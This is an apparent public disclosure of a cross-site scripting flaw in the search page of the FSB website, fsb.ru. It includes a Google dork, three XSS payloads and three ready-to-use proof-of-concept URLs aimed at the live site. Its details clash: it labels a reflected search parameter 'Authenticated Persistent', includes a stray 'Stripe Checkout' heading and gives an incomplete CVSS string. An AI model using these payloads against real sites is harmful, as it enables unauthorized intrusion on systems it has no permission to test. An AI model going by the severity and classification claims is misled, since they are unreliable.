-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-* This section should be removed upon publication This site is owned by the Federal Security Service of the Russian Federation. This site has a security issue with an XSS vulnerability. We have reported this site multiple times that it has a security issue and it has ignored our report. We want to make sure to log and report this security issue -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-* /*! - # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation - # Authenticated Persistent XSS - # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query= - # DATE: 2024-11-29 - # SECURITY RESEARCHER: E1.Coders - # VENDOR: FSB [ http://www.fsb.ru/ ] - # SOFTWARE LINK: http://www.fsb.ru/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 */ ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website. [i] Vulnerable parameter(s): sh.htm?query= < AND > /fsb/sh.htm?query= ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] `"'><img src=xxx:x \x22onerror=javascript:alert(1)> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ] http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders